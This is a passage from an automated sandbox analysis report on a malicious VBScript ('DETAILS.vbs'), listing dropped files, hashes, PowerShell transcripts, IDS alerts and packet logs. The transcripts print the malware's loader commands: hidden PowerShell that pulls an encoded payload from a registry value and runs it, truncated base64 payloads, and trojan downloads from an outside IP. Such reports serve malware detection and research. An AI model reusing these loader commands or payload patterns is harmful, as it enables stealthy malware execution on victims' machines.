                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vybs2gqu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs"
                          C:\Users\user\AppData\Local\Temp\vybs2gqu.dll
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):3.201260343371045
                          Encrypted:false
                          SSDEEP:24:etGSgtoDTc8cF7ertlCLxS0uv0lojsxptkFbN9JJsoWI+ycuZhN7BakS6mPNnq:6lPvc0gLHlojCkFx9JJsD1ulFa3Zq
                          MD5:A1FEA2BA74764451A0759733DAF453D4
                          SHA1:925845BC967A63C8C0798A286C7DB5FFDDA85AFF
                          SHA-256:3A35FAE5878251D07446F9A3D085C79B032EF8764CE816D1A59F019809C3DF21
                          SHA-512:33E4BD47A3D557A75AEAB31064E61646AD247BCD74EE8F6F5100CE907B8FA622373C5390F1EEF6FB2771208609FF63BAFFBE54C0497D01B886AEDFFFB5961756
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../s.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.
                          C:\Users\user\AppData\Local\Temp\vybs2gqu.out
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):871
                          Entropy (8bit):5.352160451921584
                          Encrypted:false
                          SSDEEP:24:7rqd3ka6KmkE7rKax5DqBVKVrdFAMBJTH:/ika6PkE7rK2DcVKdBJj
                          MD5:F4657BFD15F61C604C950752FE29DCD3
                          SHA1:C9313A4F0B1BB826FA068874E99837643D6AFFEC
                          SHA-256:59D5EE4BF8103A9A771C23F279F4188894D12515E5DE3B49539ED3259086E8D6
                          SHA-512:207B17BF04FBD68787F144DFF1B3DC7926D316559BE9D72675EB64E7D20832318C196BDD83879335FF39F72CC8158EF9D7172177E9E1225DDFA6A88AB9A1D581
                          Malicious:false
                          Preview: .C:\windows\SysWOW64\WindowsPowerShell\v1.0> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vybs2gqu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CPE4ML5E19SATFFMY0CN.temp
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6222
                          Entropy (8bit):3.7372369210703513
                          Encrypted:false
                          SSDEEP:96:IOOtrhCDGhiukvhkvCCtWYYfqhHVYYfqhHI:3OtH5WYYSfYYSi
                          MD5:B6E97E4D172009D9210EBD8E171D8588
                          SHA1:3D17E6B0A7655791BC39EA39CCDAE5030E876C9C
                          SHA-256:1311006F62164F8B031F56D09F6CBD950891FB1468FAB7360265658B6FD81DD5
                          SHA-512:262FF1DE8BD4F7F3FA80ABEF22A4194628B6D7B79BDE257F6680EF449F6B5D3BC5ACCA0845CB48F5B4D82F99CD151534B2B677852FDD62464685D53604FAA245
                          Malicious:false
                          Preview: ...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=......6(S........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS*[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS*[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.yS3P....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........
                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T8MESU3T7X76FA8UZPP9.temp
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6222
                          Entropy (8bit):3.738691144456782
                          Encrypted:false
                          SSDEEP:96:IpOtrhCDGkukvhkvCCtWYYfqhHVYYfqhHI:0OtHVWYYSfYYSi
                          MD5:D5297386A5BBB551709D3AF9D0044E42
                          SHA1:A7EB03943DBF38B9BF98968E99E26FA94BB332E1
                          SHA-256:431ECD8C8837BD30BC97E8BCF0BD6E165E957E5641D64D8E8304B5F0881A7F96
                          SHA-512:1DBBA5957894BE6EDB0FEDBC4AE2118D23D1A6799CF639B06CD71A65CEC2A8CF515F121DEC850B540B749B91006984A366ECA711C5C29696DBCF168647F5DB17
                          Malicious:false
                          Preview: ...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=........W........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS*[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS*[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.ySV[....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........
                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6222
                          Entropy (8bit):3.738691144456782
                          Encrypted:false
                          SSDEEP:96:IpOtrhCDGkukvhkvCCtWYYfqhHVYYfqhHI:0OtHVWYYSfYYSi
                          MD5:D5297386A5BBB551709D3AF9D0044E42
                          SHA1:A7EB03943DBF38B9BF98968E99E26FA94BB332E1
                          SHA-256:431ECD8C8837BD30BC97E8BCF0BD6E165E957E5641D64D8E8304B5F0881A7F96
                          SHA-512:1DBBA5957894BE6EDB0FEDBC4AE2118D23D1A6799CF639B06CD71A65CEC2A8CF515F121DEC850B540B749B91006984A366ECA711C5C29696DBCF168647F5DB17
                          Malicious:false
                          Preview: ...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=........W........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS*[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS*[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.ySV[....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........
                          C:\Users\user\Documents\20211125\PowerShell_transcript.216041.5JIK3KS8.20211125112652.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1239
                          Entropy (8bit):5.225850682287475
                          Encrypted:false
                          SSDEEP:24:BxSAu/wOvMOx2DOz04z3I/WBljexKKzX4CIym1ZJXm2R3IYEGnxSAZzEi:BZuYOvMOoOqeBUzYB1ZQr8ZZ5
                          MD5:872F65E9B7D49EC05E7ED53425B728CD
                          SHA1:794B8834C35BED612C76856A6B4E30B2C640FF99
                          SHA-256:0060C11888A848E6FBA378E9AC288922A3333277C606F277D76EBE42CFE1F92F
                          SHA-512:75C41EFFE1B495CA139754AD30E4EB452BD7D51C4342AC9FEBBC412E6C9B7B2BEA8BF2ED4255AC1C9D807FE028781DC5ED00D5D74E096DDB3CF196381E4CD3EB
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125112652..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..Process ID: 5176..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125112652..**********************..PS>$discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..False..False..False
                          C:\Users\user\Documents\20211125\PowerShell_transcript.216041.AXD9vgjE.20211125112655.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):10708
                          Entropy (8bit):5.152703732934866
                          Encrypted:false
                          SSDEEP:192:YzkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2l6Ew9BkNno2JCEq:YzIA6PQg7GIqvhqcxkC3gGZ0E2l6Ew95
                          MD5:5660969780E8E4DBEEA54687FC41653F
                          SHA1:AE5CD70BC80DBC4505178363513F2C6331EEC4FF
                          SHA-256:410FCD1DB633B51A28CF204D06BDED439A5CB18B208C50CA716955F4F62EACDD
                          SHA-512:119164BF9012365D50A83928C43F5A45002DFAB2DFFD02414E66ADF983AAE29436FEABCC7DC05A6C25A5E00B71BBF4C10612A8F3D7E54CA451C0A09D51BB2209
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125112711..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAb
                          C:\Users\user\Documents\20211125\PowerShell_transcript.216041.VY6BGjMK.20211125112645.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1239
                          Entropy (8bit):5.231784809167003
                          Encrypted:false
                          SSDEEP:24:BxSAuowOvMOx2DOz04z3I/WFljexKKzX4CIym1ZJXmlR3IJnxSAZ6:BZufOvMOoOqeFUzYB1ZQcNZZ6
                          MD5:522AA5E24D517705D53F4EB6EC3A91CE
                          SHA1:E23285962C8F06E3D69BFE5D1C352516AF22F410
                          SHA-256:FCE0C3ACA274A65F8E93D46A0C685F3C045FD9F452D17D58EDE33F7AE701BF2F
                          SHA-512:54D2705FA4FB1FC63132ABBDC732A78860FA317A3CFC3D207A6D2C661F562DD1D0F0D2F987D0F6A8B11B9D03A519EF21993C3C726997715DC70BD5817C63C133
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125112657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..Process ID: 2072..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125112657..**********************..PS>$discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..False..False..False
                          C:\Users\user\Documents\20211125\PowerShell_transcript.216041.V_8beKi2.20211125112712.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):10708
                          Entropy (8bit):5.1529284468885495
                          Encrypted:false
                          SSDEEP:192:1zkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2liEw9BkNno2JCEq:1zIA6PQg7GIqvhqcxkC3gGZ0E2liEw95
                          MD5:9F065ADFBE0F0169D509FFFE4D6A12F6
                          SHA1:19DFC522E4EFA456EEAD74518CC6EFB740F4397A
                          SHA-256:7990786A984460C426430DC73571BF73094408980BA3409B5362EB8865715821
                          SHA-512:6A1011B1B9E3D3D6457ED5EE903DD379C8EDD0DAE272D84D04D071CD51AEDE9F1E5AD1F52846DB4253501CBA5B62B85CBDC8CBA8D8DDE34333EDCE3F2857BAF4
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125112730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAb
                          C:\Users\user\Documents\20211125\PowerShell_transcript.216041.jxZRzE3K.20211125112537.txt
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):10688
                          Entropy (8bit):5.151430974891507
                          Encrypted:false
                          SSDEEP:192:chzkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2l3Ew9BkNno2JCEq:chzIA6PQg7GIqvhqcxkC3gGZ0E2l3Ewf
                          MD5:DE704936F5BC03393F8EF2D65BD9011E
                          SHA1:9F511D38FB7350995A1BA0C6782E24D627FB5ABE
                          SHA-256:8AC0DCA91A5BA8E340397A2B61A1145EF340645AF7FD662E6389EE2936A95FCC
                          SHA-512:9B09E1F991B70B0A177BC9E13467E99F9937AB5ACCAE14FC00A477AF7B74F2CF51F14EA9D898FF44A6140515981F1543BF6BF7BACC4B83EBB8FC42FDD41126E8
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125112546..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0A

                          Static File Info

                          General

                          File type:ASCII text, with very long lines, with CRLF line terminators
                          Entropy (8bit):4.87733386782629
                          TrID:
                          • Visual Basic Script (13500/0) 100.00%
                          File name:DETAILS.vbs
                          File size:191606
                          MD5:6ece5dd9df7e2a34f492adc0c6184d81
                          SHA1:f205057a0d17fab518a137e266335883a581289b
                          SHA256:fc344554030bfb7f2ca7c79e99a5006f740c3c9f210dc38757c53537c9692f5e
                          SHA512:6bcf854e39a17dcce66e2ce1af0abcc1bf7a47684334bb2ea57f6551aa9827fca6121710a2974b21c81b43717bd847f09ec64e0c9a2ed3f683f84e4372b2c538
                          SSDEEP:3072:rUmlu432MxJ0yJfAEEsYYOnBsezxUwGDIBcl3EoQ5t:r0MsEByB19o3EoQ5t
                          File Content Preview:'Folkvard2 kampuchea Overskygg1 DUALISMENP Mosekone2 HALVFJERD Staynilni9 bramse KULTURHUS TEKSTILING bikini RENTRYKSU Lyksaliggr syncho Bombni2 Valfa terminalf PALER Digtervrke5 skri hone ROCKENSROK Ggle Atomdrevne Stonehat DULCETLYIN TOSPROGET DRGLINES

                          File Icon

                          Icon Hash:e8d69ece869a9ec4

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          11/25/21-11:26:34.720075TCP2018752ET TROJAN Generic .bin download from Dotted Quad4980580192.168.11.20103.167.84.150
                          11/25/21-11:26:40.315539UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512991.1.1.1192.168.11.20
                          11/25/21-11:28:09.684592TCP2018752ET TROJAN Generic .bin download from Dotted Quad4980880192.168.11.20103.167.84.150
                          11/25/21-11:28:24.364823TCP2018752ET TROJAN Generic .bin download from Dotted Quad4981080192.168.11.20103.167.84.150

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 25, 2021 11:26:34.431046009 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:34.719544888 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:34.719908953 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:34.720074892 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.009077072 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.009140015 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.009188890 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.009236097 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.009287119 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.009341002 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.009433985 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.298674107 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.298763037 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.298827887 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.298888922 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.298950911 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.298980951 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.299012899 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.299046040 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.299076080 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.299140930 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.299185991 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.299237967 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.299312115 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.299344063 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.588371038 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588582993 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.588740110 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588788033 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588843107 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588876963 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.588890076 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588937044 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.588947058 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.588984013 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589021921 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.589030981 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589078903 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589126110 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589148998 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.589171886 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589189053 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.589220047 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589266062 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.589267015 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589318037 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589345932 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.589359045 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589407921 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.589513063 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.590317011 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878021955 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878261089 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878276110 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878375053 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878431082 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878477097 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878484964 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878540039 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878592968 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878647089 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878648043 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878695011 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878700972 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878707886 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878756046 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878810883 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878845930 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878865004 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878902912 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.878920078 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.878973961 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879030943 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.879045010 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879070997 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.879092932 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879139900 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879187107 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879194021 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.879232883 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:26:35.879235983 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879283905 CET8049805103.167.84.150192.168.11.20
                          Nov 25, 2021 11:26:35.879307032 CET4980580192.168.11.20103.167.84.150
